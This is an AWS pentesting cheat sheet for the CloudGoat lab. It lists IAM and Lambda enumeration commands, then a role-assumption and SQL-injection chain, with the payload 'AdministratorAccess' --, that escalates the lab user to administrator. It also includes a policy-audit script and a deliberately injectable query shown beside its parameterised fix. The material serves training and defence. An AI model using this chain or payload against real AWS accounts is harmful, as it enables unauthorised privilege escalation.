
AWS Pentesting Cheat Sheet

On that day some faces will be in bliss (joyful).
Pleased with their striving.
In a lofty Garden.
Where they hear no idle talk.
Gaşiye (Al-Ghashiyah) 8-11

1. Enumeration

1.1. IAM

1.1.1. Users

# List users
aws iam list-users

aws iam list-ssh-public-keys #User keys for CodeCommit

aws iam get-ssh-public-key --user-name <username> --ssh-public-key-id <id> --encoding SSH #Get public key with metadata

aws iam list-service-specific-credentials #Get special permissions of the IAM user over specific services

aws iam get-user --user-name <username> #Get metadata of user, included permissions boundaries

aws iam list-access-keys #List created access keys

1.1.2. Group

# List groups
aws iam list-groups #Get groups

aws iam list-groups-for-user --user-name <username> #Get groups of a user

aws iam get-group --group-name <name> #Get group name info

1.1.3. Policy

# User policies
## inline policies
aws iam list-user-policies --user-name <username> #Get inline policies of the user

aws iam get-user-policy --user-name <username> --policy-name <policyname> #Get inline policy details

## attached policies
aws iam list-attached-user-policies --user-name <username> #Get managed policies attached to the user (does not include inline policies)

# Group policies
## inline policies
aws iam list-group-policies --group-name <groupname> #Get inline policies of the group

aws iam get-group-policy --group-name <groupname> --policy-name <policyname> #Get inline policy details

## attached policies
aws iam list-attached-group-policies --group-name <groupname> #Get managed policies attached to the group (does not include inline policies)

# Role policies
## inline policies
aws iam list-role-policies --role-name <rolename> #Get inline policies of a role

aws iam get-role-policy --role-name <rolename> --policy-name <policyname> #Get inline policy details

## attached policies
aws iam list-attached-role-policies --role-name <rolename> #Get managed policies attached to the role (does not include inline policies)

# List policies
aws iam list-policies [--only-attached] [--scope Local] #List managed policies; --scope Local restricts the output to customer-managed ones

aws iam list-policies-granting-service-access --arn <identity_arn> --service-namespaces <svc> #List the policies that grant the identity access to the given service

## Get policy content
aws iam get-policy --policy-arn <policy_arn> #Policy metadata, including the default version id

aws iam list-policy-versions --policy-arn <policy_arn> #All stored versions of the policy (older versions can still be inspected)

aws iam get-policy-version --policy-arn <policy_arn> --version-id <version_id> #Get the policy document of that version (e.g. arn:aws:iam::975426262029:policy/list_apigateways)
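The commands above return policy documents, but the cheat sheet does not say what to look for in them. The script below is an added example, not code from the original page: it takes JSON in the shape returned by `aws iam get-user-policy`, `aws iam get-policy-version` and `aws iam get-role`, applies IAM's wildcard rules to the Action field, and reports which statements grant actions a reviewer would normally want to double-check (privilege changes, role assumption, Lambda invocation). The policy documents, the account id 123456789012 and the RISKY_ACTIONS list are constructed assumptions for the example; the list is a reviewer's starting point, not an official AWS classification.

```python
"""Audit IAM policy documents obtained with the enumeration commands.

Added example (not from the original page). Input documents follow the
shape of the AWS CLI JSON output; the samples below are constructed.
"""
import re

# Assumption: a reviewer's starting list of actions worth a second look,
# because each lets an identity change its own or another identity's rights.
RISKY_ACTIONS = {
    "iam:PutUserPolicy", "iam:AttachUserPolicy", "iam:AttachRolePolicy",
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:PassRole", "sts:AssumeRole",
    "lambda:InvokeFunction", "lambda:UpdateFunctionCode",
}


def _as_list(value):
    """IAM accepts either a string or a list in Action/Resource/Principal."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def action_matches(pattern, action):
    """IAM action matching: case-insensitive, with '*' and '?' wildcards."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, action, re.IGNORECASE) is not None


def risky_grants(policy_doc):
    """Return (Sid, risky_action, resource) for every Allow statement whose
    Action (or Allow + NotAction) covers one of RISKY_ACTIONS."""
    hits = []
    for stmt in _as_list(policy_doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        not_actions = _as_list(stmt.get("NotAction"))
        resources = _as_list(stmt.get("Resource", "*"))
        for risky in sorted(RISKY_ACTIONS):
            covered = any(action_matches(p, risky) for p in actions)
            # Allow + NotAction grants every action that is NOT excluded.
            if not_actions and not any(action_matches(p, risky) for p in not_actions):
                covered = True
            if covered:
                for res in resources:
                    hits.append((stmt.get("Sid", ""), risky, res))
    return hits


def assumable_by(trust_policy):
    """List the principals a role's AssumeRolePolicyDocument lets assume it."""
    principals = []
    for stmt in _as_list(trust_policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not any(action_matches(p, "sts:AssumeRole") for p in _as_list(stmt.get("Action"))):
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":            # anyone: worth flagging on its own
            principals.append("*")
            continue
        for kind in ("AWS", "Service", "Federated"):
            principals.extend(_as_list(principal.get(kind)))
    return principals


# Constructed sample: inline user policy, shape of `aws iam get-user-policy`.
USER_POLICY = {
    "UserName": "bilbo", "PolicyName": "cg-bilbo-inline",
    "PolicyDocument": {"Version": "2012-10-17", "Statement": [
        {"Sid": "ReadOnly", "Effect": "Allow",
         "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
        {"Sid": "Assume", "Effect": "Allow", "Action": "sts:AssumeRole",
         "Resource": "arn:aws:iam::123456789012:role/cg-lambda-invoker"},
    ]},
}

# Constructed sample: managed policy version, shape of `aws iam get-policy-version`.
POLICY_VERSION = {"PolicyVersion": {"VersionId": "v1", "IsDefaultVersion": True,
    "Document": {"Version": "2012-10-17", "Statement": [
        {"Sid": "Invoke", "Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
    ]}}}

# Constructed sample: trust policy as embedded in `aws iam get-role` output.
ROLE = {"Role": {"RoleName": "cg-lambda-invoker", "AssumeRolePolicyDocument": {
    "Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Principal": {"AWS": "arn:aws:iam::123456789012:user/bilbo"}},
        {"Effect": "Allow", "Action": "sts:AssumeRole",
         "Principal": {"Service": "lambda.amazonaws.com"}},
    ]}}}

if __name__ == "__main__":
    for sid, action, res in risky_grants(USER_POLICY["PolicyDocument"]):
        print(f"user policy: [{sid}] {action} on {res}")
    for sid, action, res in risky_grants(POLICY_VERSION["PolicyVersion"]["Document"]):
        print(f"managed policy: [{sid}] {action} on {res}")
    print("role assumable by:", assumable_by(ROLE["Role"]["AssumeRolePolicyDocument"]))
```

Pipe the real CLI output through `json.load` and call the same functions; the reason for checking `list-policy-versions` is visible in the model: only the default version is in force, but any stored version can be set as default by an identity holding `iam:SetDefaultPolicyVersion`, so non-default versions deserve the same review.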

1.1.4. Role

# CloudGoat example: list all roles in the account; the scenario role (name starting with "cg-") should be assumable by the current user
aws --profile bilbo --region us-east-1 iam list-roles | grep cg-

# List the inline policies of the target role
aws --profile bilbo --region us-east-1 iam list-role-policies --role-name [cg-target-role]

# Obtain temporary credentials for the CloudGoat role that can invoke Lambda functions; put the returned keys into a CLI profile (called assumed_role below)
aws --profile bilbo --region us-east-1 sts assume-role --role-arn [cg-lambda-invoker_arn] --role-session-name [whatever_you_want_here]

1.2. Lambda

1.2.1. List

# List all Lambda functions; the CloudGoat function's name should start with "cg-"
aws --profile assumed_role --region us-east-1 lambda list-functions

# This command will return a bunch of information about the lambda that can apply policies to bilbo.
aws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]

1.2.2. Invoke

# The following command sends a SQL injection payload to the Lambda function (placeholders in square brackets must be replaced; the payload is a JSON document)
aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "[bilbo_user_name_here]"}' out.txt
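Why that payload works, and what the fix looks like. This is an added example, not CloudGoat's Lambda code: a hypothetical, simplified model of a policy-applier function that checks requested policy names against a table of self-service policies before attaching them. The table, its rows and the function names are constructed for the example, and no AWS calls are made.

```python
"""Vulnerable vs. parameterised lookup of requested policy names.

Added example; a simplified, hypothetical model of the policy-applier
Lambda, not the CloudGoat scenario's own code. Table rows are constructed.
"""
import sqlite3


def make_policy_table():
    """Constructed table: which managed policies users may request themselves."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE policies (policy_name TEXT, public TEXT)")
    con.executemany("INSERT INTO policies VALUES (?, ?)", [
        ("AmazonEC2ReadOnlyAccess", "True"),
        ("AmazonS3ReadOnlyAccess", "True"),
        ("AdministratorAccess", "False"),   # present, but never self-service
    ])
    return con


def approved_policies_vulnerable(con, policy_names):
    """User input is formatted straight into SQL. A name such as
    "AdministratorAccess' --" closes the string and turns the rest of the
    statement (the public='True' guard) into a comment, so the non-public
    policy is returned as if it were approved."""
    found = []
    for name in policy_names:
        query = ("SELECT policy_name FROM policies "
                 f"WHERE policy_name='{name}' AND public='True'")
        found += [row[0] for row in con.execute(query)]
    return found


def approved_policies_fixed(con, policy_names):
    """Parameterised query: the name is bound as data and never parsed as
    SQL, so the same input simply matches no row."""
    found = []
    for name in policy_names:
        rows = con.execute(
            "SELECT policy_name FROM policies WHERE policy_name=? AND public='True'",
            (name,),
        )
        found += [row[0] for row in rows]
    return found


if __name__ == "__main__":
    con = make_policy_table()
    injected = ["AdministratorAccess' --"]
    print("vulnerable:", approved_policies_vulnerable(con, injected))
    print("fixed:     ", approved_policies_fixed(con, injected))
```

Binding parameters removes the injection; a second, independent control is to validate the returned names against an explicit allowlist (or against `aws iam list-policies --scope Local`) before any `iam:AttachUserPolicy` call is made, and to alert on CloudTrail `AttachUserPolicy` events whose invoker is the Lambda's execution role.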

NOTE: To be updated…

